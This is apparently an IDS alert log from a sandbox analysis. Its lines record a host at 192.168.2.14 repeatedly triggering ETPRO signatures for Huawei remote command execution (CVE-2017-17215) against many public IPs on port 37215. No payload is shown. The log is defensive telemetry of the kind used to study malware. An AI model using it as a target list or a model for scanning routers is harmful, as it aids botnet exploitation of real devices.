                                                    07/10/24-08:27:23.781687TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5704037215192.168.2.1441.6.252.187
                                                    07/10/24-08:26:15.838617TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3700237215192.168.2.14197.254.35.64
                                                    07/10/24-08:26:23.294907TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4891837215192.168.2.14157.60.120.138
                                                    07/10/24-08:27:31.461924TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6026037215192.168.2.14191.184.102.33
                                                    07/10/24-08:27:30.499303TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4401637215192.168.2.1424.107.242.142
                                                    07/10/24-08:26:43.745002TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5270837215192.168.2.14157.215.219.168
                                                    07/10/24-08:27:19.277665TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3286637215192.168.2.14157.151.81.174
                                                    07/10/24-08:26:13.828351TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5013637215192.168.2.14197.130.93.226
                                                    07/10/24-08:26:13.790493TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5383837215192.168.2.1441.58.113.10
                                                    07/10/24-08:27:14.026177TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6036237215192.168.2.14197.235.116.148
                                                    07/10/24-08:27:10.695827TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4831237215192.168.2.1481.93.141.160
                                                    07/10/24-08:27:10.679025TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4022237215192.168.2.14202.146.6.7
                                                    07/10/24-08:26:38.536872TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3678037215192.168.2.14197.252.28.52
                                                    07/10/24-08:26:22.273288TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4798837215192.168.2.1441.100.59.110
                                                    07/10/24-08:26:28.874415TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5258837215192.168.2.14157.5.93.53
                                                    07/10/24-08:26:33.263380TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3901037215192.168.2.14159.26.97.197
                                                    07/10/24-08:26:11.664680TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5542237215192.168.2.1441.9.0.7
                                                    07/10/24-08:26:23.351909TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3933437215192.168.2.1441.68.229.239
                                                    07/10/24-08:27:02.927617TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3769237215192.168.2.14197.30.201.93
                                                    07/10/24-08:27:27.155945TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5211037215192.168.2.14157.48.138.184
                                                    07/10/24-08:26:20.190531TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5052837215192.168.2.1441.215.152.72
                                                    07/10/24-08:26:51.950900TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5035837215192.168.2.14157.185.252.236
                                                    07/10/24-08:26:36.425072TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3524437215192.168.2.1458.84.249.101
                                                    07/10/24-08:26:13.798574TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5257837215192.168.2.14131.76.42.65
                                                    07/10/24-08:26:53.185789TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4779237215192.168.2.1441.97.63.138
                                                    07/10/24-08:27:13.750468TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4954837215192.168.2.14157.195.7.132
                                                    07/10/24-08:26:25.478512TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4909037215192.168.2.1441.146.30.225
                                                    07/10/24-08:26:38.608580TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4671837215192.168.2.1441.234.20.133
                                                    07/10/24-08:27:19.264327TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5378437215192.168.2.14206.141.231.87
                                                    07/10/24-08:26:41.476228TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5705437215192.168.2.14157.127.210.185
                                                    07/10/24-08:26:22.216142TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4848437215192.168.2.1441.104.199.102
                                                    07/10/24-08:27:14.850693TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5564037215192.168.2.1417.240.190.141
                                                    07/10/24-08:26:43.902594TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4922637215192.168.2.14197.22.150.114
                                                    07/10/24-08:27:17.053673TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5950637215192.168.2.14197.255.3.138
                                                    07/10/24-08:26:17.956514TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3844837215192.168.2.14157.92.180.88
                                                    07/10/24-08:27:05.132533TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5568037215192.168.2.14159.82.114.62
                                                    07/10/24-08:27:27.036328TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5372837215192.168.2.1441.114.235.247
                                                    07/10/24-08:27:08.373300TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4556637215192.168.2.1441.43.54.138
                                                    07/10/24-08:26:26.591213TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5815637215192.168.2.14157.141.252.134
                                                    07/10/24-08:26:14.810529TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3738837215192.168.2.14157.243.42.124
                                                    07/10/24-08:27:24.941876TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5257837215192.168.2.1441.244.184.145
                                                    07/10/24-08:26:57.584136TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4766037215192.168.2.14197.24.243.195
                                                    07/10/24-08:27:28.134623TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4866837215192.168.2.14197.254.103.42
                                                    07/10/24-08:27:31.555849TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6003237215192.168.2.14222.35.43.106
                                                    07/10/24-08:26:11.515884TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5676037215192.168.2.1418.58.222.60
                                                    07/10/24-08:27:28.162130TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3498237215192.168.2.14197.110.189.251
                                                    07/10/24-08:26:20.090184TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5411237215192.168.2.1441.169.56.131
                                                    07/10/24-08:26:31.098099TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3963237215192.168.2.14197.3.38.111
                                                    07/10/24-08:26:25.441344TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3999837215192.168.2.14157.123.197.243
                                                    07/10/24-08:26:11.149844TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4272837215192.168.2.14139.13.35.184
                                                    07/10/24-08:27:22.810322TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4693837215192.168.2.148.152.47.108
                                                    07/10/24-08:26:38.557842TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3380837215192.168.2.14197.36.159.232
                                                    07/10/24-08:26:59.655988TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5475237215192.168.2.14197.188.43.190
                                                    07/10/24-08:27:22.548548TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5614237215192.168.2.1468.61.181.72
                                                    07/10/24-08:27:08.365317TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3899637215192.168.2.14157.3.57.159
                                                    07/10/24-08:26:23.322127TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6053437215192.168.2.14197.43.74.100
                                                    07/10/24-08:26:55.376308TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4216237215192.168.2.14157.17.39.130
                                                    07/10/24-08:26:59.804937TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4410837215192.168.2.14157.118.245.222
                                                    07/10/24-08:26:17.941033TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5590437215192.168.2.14157.82.105.251
                                                    07/10/24-08:26:41.466063TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5371837215192.168.2.14155.109.218.27
                                                    07/10/24-08:26:36.399838TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5187637215192.168.2.1499.72.208.235
                                                    07/10/24-08:27:22.482500TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4067637215192.168.2.1478.235.11.83
                                                    07/10/24-08:26:14.812740TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5240237215192.168.2.14197.51.177.198
                                                    07/10/24-08:26:15.840335TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5090437215192.168.2.14146.131.226.72
                                                    07/10/24-08:27:13.714524TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3662237215192.168.2.14157.191.96.240
                                                    07/10/24-08:26:23.303062TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3940037215192.168.2.14157.26.14.125
                                                    07/10/24-08:26:26.529010TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5134237215192.168.2.14157.191.190.210
                                                    07/10/24-08:27:22.810322TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4290637215192.168.2.14197.35.5.141
                                                    07/10/24-08:26:17.962389TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5589837215192.168.2.14211.39.197.24
                                                    07/10/24-08:26:22.272664TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5302637215192.168.2.14157.164.218.155
                                                    07/10/24-08:27:22.562470TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5945637215192.168.2.14197.38.254.210
                                                    07/10/24-08:26:36.424272TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4466437215192.168.2.1476.1.36.8
                                                    07/10/24-08:26:38.586951TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4197437215192.168.2.14157.214.206.12
                                                    07/10/24-08:26:52.050918TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4552637215192.168.2.14197.25.160.10
                                                    07/10/24-08:26:25.505389TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4590237215192.168.2.14157.166.22.215
                                                    07/10/24-08:27:11.513310TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5450837215192.168.2.14197.168.198.222
                                                    07/10/24-08:27:03.009589TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3348837215192.168.2.14221.57.38.189
                                                    07/10/24-08:26:11.220716TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4393437215192.168.2.1490.7.62.50
                                                    07/10/24-08:27:20.488925TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4024037215192.168.2.14157.211.225.126
                                                    07/10/24-08:27:22.756681TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5697637215192.168.2.14103.188.41.51
                                                    07/10/24-08:26:55.350544TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3894237215192.168.2.1441.62.31.43
                                                    07/10/24-08:27:11.551943TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5291237215192.168.2.14157.61.237.180
                                                    07/10/24-08:26:52.054168TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4424637215192.168.2.14121.8.184.166
                                                    07/10/24-08:27:22.799639TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3523637215192.168.2.1441.175.126.196
                                                    07/10/24-08:26:55.277913TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5446037215192.168.2.14157.136.155.68
                                                    07/10/24-08:26:59.640486TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3775637215192.168.2.14157.197.203.20
                                                    07/10/24-08:26:36.422822TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5902237215192.168.2.14157.81.29.221
                                                    07/10/24-08:26:41.397697TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6018437215192.168.2.14157.181.68.245
                                                    07/10/24-08:26:33.257130TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5928637215192.168.2.14157.219.73.203
                                                    07/10/24-08:27:02.722958TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4541037215192.168.2.14197.109.16.205
                                                    07/10/24-08:26:14.809030TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3513037215192.168.2.14157.236.84.65
                                                    07/10/24-08:27:05.179057TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5358437215192.168.2.14197.6.36.205
                                                    07/10/24-08:26:22.237205TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5940237215192.168.2.1441.136.158.21
                                                    07/10/24-08:27:08.397659TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6019837215192.168.2.14151.137.139.187
                                                    07/10/24-08:27:10.544056TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3776637215192.168.2.1441.101.231.80
                                                    07/10/24-08:26:52.070871TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5942837215192.168.2.14197.79.9.165
                                                    07/10/24-08:26:25.519002TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3826637215192.168.2.1441.235.40.199
                                                    07/10/24-08:26:36.368939TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5180437215192.168.2.1450.162.145.88
                                                    07/10/24-08:26:34.225931TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3398237215192.168.2.14157.213.71.139
                                                    07/10/24-08:27:11.479148TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3631037215192.168.2.14197.215.186.222
                                                    07/10/24-08:26:13.659815TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5096637215192.168.2.14197.168.135.189
                                                    07/10/24-08:26:55.322726TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4743437215192.168.2.1441.120.241.39
                                                    07/10/24-08:26:13.815313TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4730437215192.168.2.14157.253.0.55
                                                    07/10/24-08:26:14.801295TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3671837215192.168.2.14157.29.125.66
                                                    07/10/24-08:27:27.161744TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3766637215192.168.2.14102.77.132.31
                                                    07/10/24-08:26:17.930336TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3610837215192.168.2.1441.147.127.234
                                                    07/10/24-08:27:02.815601TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3437837215192.168.2.1441.102.190.119
                                                    07/10/24-08:26:41.420052TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4139437215192.168.2.14157.204.77.54
                                                    07/10/24-08:26:55.386841TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3282237215192.168.2.14157.131.184.79
                                                    07/10/24-08:26:11.617783TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4878637215192.168.2.14197.87.221.120
                                                    07/10/24-08:26:14.814153TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4368237215192.168.2.14197.60.223.111
                                                    07/10/24-08:26:41.329184TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3610637215192.168.2.1441.33.42.70
                                                    07/10/24-08:27:07.389277TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4998237215192.168.2.1462.111.159.169
                                                    07/10/24-08:27:14.834981TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6079837215192.168.2.14157.151.229.62
                                                    07/10/24-08:26:59.860909TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3802837215192.168.2.14157.145.66.22
                                                    07/10/24-08:27:05.183998TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4329037215192.168.2.14197.242.212.37
                                                    07/10/24-08:26:42.154105TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4340637215192.168.2.14107.192.155.240
                                                    07/10/24-08:27:02.922365TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4297437215192.168.2.1441.88.194.190
                                                    07/10/24-08:26:15.870897TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6076237215192.168.2.1412.186.245.152
                                                    07/10/24-08:26:59.691821TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3878437215192.168.2.1441.27.102.168
                                                    07/10/24-08:27:02.994368TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4098237215192.168.2.1441.176.22.15
                                                    07/10/24-08:26:17.939708TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5305637215192.168.2.1483.128.57.10
                                                    07/10/24-08:26:33.173734TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5894237215192.168.2.14154.96.131.192
                                                    07/10/24-08:27:30.523582TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5492437215192.168.2.14157.234.65.102
                                                    07/10/24-08:26:25.469332TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3407637215192.168.2.14157.2.232.237
                                                    07/10/24-08:26:38.586951TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4821837215192.168.2.14157.231.203.232
                                                    07/10/24-08:26:33.217527TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5175837215192.168.2.14157.219.142.31
                                                    07/10/24-08:26:25.504243TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3501237215192.168.2.14197.77.126.20
                                                    07/10/24-08:27:10.668583TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5848837215192.168.2.14157.109.48.161
                                                    07/10/24-08:26:59.657885TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4001237215192.168.2.14197.246.95.51
                                                    07/10/24-08:27:05.181070TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5294037215192.168.2.14197.183.52.122
                                                    07/10/24-08:27:33.881615TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4054637215192.168.2.14106.216.8.201
                                                    07/10/24-08:26:52.022407TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5633437215192.168.2.14157.11.84.198
                                                    07/10/24-08:26:26.603230TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5161037215192.168.2.14176.13.121.139
                                                    07/10/24-08:26:31.088936TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6051437215192.168.2.14157.206.19.156
                                                    07/10/24-08:27:19.274123TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4428837215192.168.2.14197.187.24.6
                                                    07/10/24-08:26:59.522844TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3668837215192.168.2.145.47.6.98
                                                    07/10/24-08:26:17.933162TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4289037215192.168.2.14157.151.162.70
                                                    07/10/24-08:26:41.413310TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5923837215192.168.2.14157.24.86.235
                                                    07/10/24-08:27:11.542613TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5940037215192.168.2.14197.120.135.148
                                                    07/10/24-08:27:32.583920TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4439237215192.168.2.14197.18.179.160
                                                    07/10/24-08:26:23.322732TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3938637215192.168.2.1441.94.239.224
                                                    07/10/24-08:26:20.098304TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5066837215192.168.2.14157.86.29.24
                                                    07/10/24-08:26:25.474716TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4971637215192.168.2.14157.11.11.7
                                                    07/10/24-08:27:32.548179TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4516837215192.168.2.14157.160.205.20
                                                    07/10/24-08:26:41.512805TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5131437215192.168.2.14197.113.218.23
                                                    07/10/24-08:26:55.462695TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5976437215192.168.2.14157.249.189.119
                                                    07/10/24-08:27:33.890908TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4875237215192.168.2.1441.191.210.91
                                                    07/10/24-08:26:45.609280TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5942837215192.168.2.1441.66.94.68
                                                    07/10/24-08:26:13.807864TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4182037215192.168.2.14157.37.35.0
                                                    07/10/24-08:27:30.454627TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5756637215192.168.2.1441.168.255.41
                                                    07/10/24-08:26:55.364667TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3905037215192.168.2.14197.2.26.224
                                                    07/10/24-08:26:41.482479TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5285637215192.168.2.1485.192.248.10
                                                    07/10/24-08:27:31.485057TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3422837215192.168.2.14222.167.129.42
                                                    07/10/24-08:27:23.893892TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4169237215192.168.2.1460.3.143.177
                                                    07/10/24-08:26:52.069901TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3850837215192.168.2.1441.33.38.239
                                                    07/10/24-08:27:05.148385TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4305637215192.168.2.1441.21.224.226
                                                    07/10/24-08:27:24.839562TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4122037215192.168.2.1441.163.208.200
                                                    07/10/24-08:26:52.013363TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4198237215192.168.2.1441.172.24.93
                                                    07/10/24-08:27:05.098210TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4705437215192.168.2.14100.53.48.234
                                                    07/10/24-08:27:10.576651TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3713437215192.168.2.1441.176.5.65
                                                    07/10/24-08:26:17.971584TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4993237215192.168.2.14157.81.216.202
                                                    07/10/24-08:27:13.999286TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3330837215192.168.2.1492.34.46.62
                                                    07/10/24-08:27:20.480155TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5324637215192.168.2.14197.26.167.2
                                                    07/10/24-08:27:14.847892TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4669637215192.168.2.14157.58.250.194
                                                    07/10/24-08:27:10.601201TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3883037215192.168.2.14157.135.45.79
                                                    07/10/24-08:27:08.421673TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5750437215192.168.2.1466.192.138.219
                                                    07/10/24-08:27:07.376641TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5847037215192.168.2.14197.83.130.35
                                                    07/10/24-08:26:33.196702TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4926437215192.168.2.14157.212.249.230
                                                    07/10/24-08:27:02.789952TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4240637215192.168.2.14197.183.50.77
                                                    07/10/24-08:27:27.153335TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3692837215192.168.2.14197.138.149.206
                                                    07/10/24-08:27:13.850530TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5677037215192.168.2.14157.226.187.102
                                                    07/10/24-08:26:28.868107TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4690637215192.168.2.14162.6.100.188
                                                    07/10/24-08:26:36.346095TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4608037215192.168.2.14197.77.253.151
                                                    07/10/24-08:26:41.375610TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4362437215192.168.2.14157.129.57.192
                                                    07/10/24-08:27:23.896326TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4542237215192.168.2.14197.241.231.117
                                                    07/10/24-08:26:43.913134TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5236037215192.168.2.1427.103.238.69
                                                    07/10/24-08:26:43.554378TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4166037215192.168.2.14129.112.163.212
                                                    07/10/24-08:27:27.155945TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4146437215192.168.2.1441.165.178.91
                                                    07/10/24-08:26:31.102240TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3453037215192.168.2.14157.48.58.180
                                                    07/10/24-08:26:43.680927TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5403837215192.168.2.14197.202.63.149
                                                    07/10/24-08:27:13.889582TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5198237215192.168.2.14157.158.254.38
                                                    07/10/24-08:26:17.978087TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4043437215192.168.2.14197.20.15.251
                                                    07/10/24-08:26:38.525965TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3481437215192.168.2.14157.196.57.74
                                                    07/10/24-08:26:20.165176TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5794637215192.168.2.14157.78.112.83
                                                    07/10/24-08:26:43.813541TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3477437215192.168.2.14157.90.67.48
                                                    07/10/24-08:26:53.191310TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3798837215192.168.2.14197.45.146.79
